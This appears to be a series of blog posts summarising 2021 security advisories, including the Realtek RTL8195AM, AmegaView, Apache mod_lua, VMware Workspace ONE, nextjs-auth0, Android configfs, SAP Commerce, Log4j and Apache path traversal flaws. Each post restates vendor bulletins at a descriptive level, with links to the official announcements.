Preface: In 2021, there are more than 10 billion active IoT devices.WiFi connection is part of the IoT device.It cannot lack this feature.

Background: The Realtek RTL8195AM is a highly integrated single-chip with a low-power-consumption mechanism ideal for IoT (Internet of Things) applications. It combines an ARM®Cortex™-M3 MCU, WLAN MAC, a 1T1R capable WLAN baseband /RF and NFC in a single chip. It provides useful high-speed connectivity interfaces, such as USB 2.0 host, USB 2.0 device, SDMMC HS, SDIO device, and Ethernet MII/RMII interfaces.

To get started with using MQTT, you can follow the basic example guide here for the RTL8195 development board. This example uses the MQTT protocol to allow for control of an LED over the internet. Source code for the example can be found at AmebaIoT’s GitHub repository.

Vulnerability details: A stack buffer overflow was discovered on Realtek RTL8195AM device before 2.0.10, it exists in the client code when an attacker sends a big size Authentication challenge text in WEP security.

Official announcement: https://www.amebaiot.com/en/security_bulletin/cve-2021-39306/

Reference 1: In Shared Key authentication, the WEP key is used for authentication in a four-step challenge-response handshake:

1.The client sends an authentication request to the Access Point.
2.The Access Point replies with a clear-text challenge.
3.The client encrypts the challenge-text using the configured WEP key and sends it back in another authentication request.
4.The Access Point decrypts the response. If this matches the challenge text, the Access Point sends back a positive reply.

Reference 2: The access point responds by generating a sequence of characters called a challenge text for the computer.
The computer encrypts the challenge text with its WEP key and transmits the “message” back to the access point.

Preface: CVE Numbering Authorities (CNAs) release published vulnerability details for MesaLabs Amega version 3.0 on 12/21/2021. Perhaps the criticality of the design flaw will be impacted whole world including Hospitals, Blood Banks, Pharmaceutical, Laboratories,… As a matter of fact, the related details has been released on HIPAA report on June this year.

Background: AmegaView Environmental Monitoring system (CMS) 3.0 was released on 2015. The AmegaView CMS, consists of a robust hardware package and Mesa’s user-friendly software.
AmegaView is used to monitor parameters including Temperature, Humidity, CO2, O2, Differential Pressure, Leak Detection, Voltage, Door Switches, Switch Closures, Air Flow, Refrigerators, Freezers……
In addition, due to its function, it is used in various industries, such as hospitals, blood banks, pharmaceuticals, laboratories,..etc.

Vulnerability details:

CVE-2021-27447 – CVSS 10/10 – Flaw due to improper neutralization of special elements used in a command, which could allow an attacker to execute arbitrary code.
CVE-2021-27449 – CVSS 9.9/10 – Flaw due to improper neutralization of special elements used in a command, which could allow an attacker to execute commands in the web server.
CVE-2021-27445 – CVSS 7.8/10 – Insecure file permissions which could be exploited to elevate privileges on the device.
CVE-2021-27451 – CVSS 7.3/10 – Improper authentication due to passcodes being generated by an easily reversible algorithm, which could allow an attacker to gain access to the device.
CVE-2021-27453 – CVSS 7.3/10 – Authentication bypass issue that could allow an attacker to gain access to the web application.

If you are interested in possible attack scenarios, please refer to the attached drawings for reference.

Ref – ICS Advisory (ICSA-21-147-03): https://www.cisa.gov/uscert/ics/advisories/icsa-21-147-03

Preface: Sometimes misconfiguration or abuse will be transformed as a vulnerability.

Background: Apache Module mod_lua (Official note) -This module holds a great deal of power over httpd, which is both a strength and a potential security risk. It is not recommended that you use this module on a server that is shared with users you do not trust, as it can be abused to change the internal workings of httpd.

The basic module loading directive is shown as follow: LoadModule lua_module modules/mod_lua[.]so.
Remark: mod_lua provides a handler named lua-script, which can be used with a SetHandler or AddHandler directive.

Vulnerability details: CVE-2021-44790 A carefully crafted request body can cause a buffer overflow in the mod_lua multipart parser (r:parsebody() called from Lua scripts).
The Apache httpd team is not aware of an exploit for the vulnerabilty though it might be possible to craft one. This issue affects Apache HTTP Server 2.4.51 and earlier.

Comment: According to point 1. The official warning informs Apache system owners to be careful with mod_lua modules.
So we can say on behalf of Apache that this is a configuration abuse defect.

Reference: https://www.openwall.com/lists/oss-security/2021/12/20/4

Preface: CISA urges vigilance on the VMware Workspace ONE UEM console.

Background: The aim of configure the httphandler for display blobs (Binary Large Object) such as an image, a video or a file.
In a nutshell the blobhandler allows us to get an URL to diplay a blob stored in our database.Whether is there any cyber security on this method? As far as we know, it is possible to Call HTTPhandler from jQuery, Pass data and retrieve in JSON format. A vulnerability remediation has been released by vendor last Friday (16th Dec, 2021). A Server Side Request Forgery (SSRF) vulnerability in VMware Workspace ONE UEM console was privately reported to VMware. Patches and workarounds are available to address this vulnerability in affected VMware products. The issue has been mitigated for VMware-hosted Workspace ONE consoles. For more details, please refer the link – https://www.vmware.com/security/advisories/VMSA-2021-0029.html

Observation: A workaround has been given by vendor. When the request has a “url” query parameter, the solution is to block any access to the BlobHandler.ashx endpoint. After applying the workaround, any request with blocking mode should result in a 404 Not Found response. For more details. please refer to link – https://kb.vmware.com/s/article/87167

Not sure whether is there another regular expression embedded in web server side? Otherwise, VMware administrator should be careful about the case sensitive matter.

Preface: The Auth0 Next.js SDK is a library for implementing user authentication in Next.js applications.

Background: The Auth0 Next. js SDK is a library for implementing user authentication in Next[.] js applications. Auth0 offers two ways to implement login authentication for your applications:

• Universal Login where users log in to your application through a page hosted by Auth0.
• Embedded Login where users log in to your application through a page you host.

Vulnerability details: If you are using nextjs-auth0 Authorization solution. The client application redirects the user authentication to Auth0 server , who handles all the required authentication and authorization logic (sign-up, sign-in, MFA, consent, and so on). Once users log in, Auth0 redirects them to your application with an Authorization Code in the query string. The Auth0 Next.js SDK is a library for implementing user authentication in Next.js applications. Versions before 1.6.2 do not filter out certain returnTo parameter values from the login url, which expose the application to an open redirect vulnerability.

The open redirect vulnerability can manipulates users and redirects them from one site to another. The potential risk of this vulnerability is that when attacker doing the exploition. He can combines with other vulnerabilities (For example: server-side request forgery, XSS-Auditor bypass and Oauth vulnerability) to increasing the risk of impact.

Reference: Next[.] js is a JavaScript framework created by Zeit.
It lets you build server-side rendering and static web applications using React. Key Applications / Companies Leveraging The Power Of React Native including Facebook, Instagram, Walmart, Bloomberg, Tesla…….

Official announcement: https://github.com/auth0/nextjs-auth0/security/advisories/GHSA-2mqv-4j3r-vjvp

Preface: The biggest advantage for Android is actually in hardware, not software. The best part of Android platform is that it is flexible in accommodating third party applications which facilitates the Android user to add more functionality in his/her mobile device.

Background: Configfs is a ram-based filesystem that provides the converse of sysfs’s functionality. Where sysfs is a filesystem-based view of kernel objects, configfs is a filesystem-based manager of kernel objects, or config_items.

Both sysfs and configfs can and should exist together on the same system. One is not a replacement for the other.

Privileged or kernel mode is the processing mode that allows code to have direct access to all hardware and memory in the system. Kernel mode means when any process or program wants to use any functionality controlled by Operating System, so in that case,
we make a system call to execute any particular set of instructions stored in O.S. So these set of instructions are executed in Kernel mode.

Vulnerability details: About CVE-2021-39656, .The remedy was completed in March 2021. This week’s CVE record provides a summary (see below):

In __configfs_open_file of file[.]c, there is a possible use-after-free due to improper locking. This could lead to local escalation of privilege in the kernel with System execution privileges needed.

Remedy: To fix this issue, remove the config_item_put in __configfs_open_file to balance the refcount of config_item. Please refer to the attached picture for details.

Official announcement: https://android.googlesource.com/kernel/common/+/14fbbc8297728e880070f7b077b3301a8c698ef9

Preface: The Oracle 10g limitation of 1000 items in a static IN clause. How do you increase maximum number of expressions in a list is 1000 in Oracle? Any in statement like x in (1,2,3) can be rewritten as (1,x) in ((1,1), (1,2), (1,3)) and the 1000 element limit will no longer apply.

Background: SAP Commerce organizes data like product information to be propagated using multiple communication channels in a consistent and efficient way. This enables businesses to sell products across multiple distribution channels. ORA-01792 error message alert that maximum number of columns in a table or view is 1000 on remote DB, this is a unpublished design limitation.

Vulnerability details: If configured to use an Oracle database and if a query is created using the flexible search java api with a parameterized “in” clause, SAP Commerce – versions 1905, 2005, 2105, 2011, allows attacker to execute crafted database queries, exposing backend database. The vulnerability is present if the parameterized “in” clause accepts more than 1000 values.

Observation: Backend is consists of the server which provides data on request, the application which channels it, and the database which organizes the information. If attacker known the details, it let them easier to do the SQL injection.

Official details: For more details, please refer to the link – https://wiki.scn.sap.com/wiki/display/PSR/SAP+Security+Patch+Day+-+December+2021

Preface: We like Java and sometimes we hate it. People think that the php programming language will be eliminated, but there are still many people still using it.

Background: Apache is a pioneer in occupying the Web server platform market. Over time, people worry about the weaknesses of the Apache overall design. So a group of users migrated to NGINX. In fact, Apache still has a small number of loyal fans, the proportion is not small, it include vendor. If people ask you, who is safe? Is NGINX safer than Apache? If a system platform needs to work with other application components to form a service. Therefore, it doesn’t make sense to only focus on whether a single component is designed to be safe.

According to numerous open source reports, Log4j is used with Apache software like Apache Struts, Solr, Druid, along with other technologies. Apache Log4j is a very old logging framework and was the most popular one for several years. It introduced basic concepts, like hierarchical log levels and loggers, that are still used by modern logging frameworks. The development team announced Log4j’s end of life in 2015.

PHP Server Monitor (Phpservermon) is a script that checks whether your websites and servers are up and running. It comes with a web based user interface where you can manage your services and websites, and you can manage users for each server with a mobile number and email address.

Vulnerability details:

CVE-2021-44228 – Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.

Ref: https://nvd.nist.gov/vuln/detail/CVE-2021-44228

CVE-2021-4097 – A vulnerability was found in phpservermon (unknown version) and classified as critical. The phpservermon is vulnerable to Improper Neutralization of CRLF Sequences. CRLF injections are vulnerabilities where the attacker is able to inject CR (carriage return, ASCII 13) and LF (line feed, ASCII 10) characters into the web application. This lets the attacker add extra headers to HTTP responses or even make the browser ignore the original content and process injected content instead.

Ref: https://www.tenable.com/cve/CVE-2021-4097

Preface: Some people say that CGI-Bin is a historical site. Today’s onerous security environment, perhaps not people use it. The truth tell us is that CGI-Bin still have space for survival.

Background: About two months ago, the proof of concept for CVE-2021-41773 (Apache 2.4.49 & 2.4.50) vulnerability was released. The remedy solution is modify the configuration of Apache server httpd[.]conf file. As a matter of fact, Apache server has multifunciton, high capability feature. Therefore if software developer and web master do some mistake in this file. It will expand the problem if it has vulnerability occurs.

Vulnerability details (CVE-2021-42013): Found that remedy for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives.

If files outside of these directories are not protected by the usual default configuration “require all denied”, these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution.

Reference: In addition to the above-mentioned vulnerabilities, the supplier also discovered new vulnerabilities. For more details, please refer to the link – https://httpd.apache.org/security/vulnerabilities_24.html#2.4.49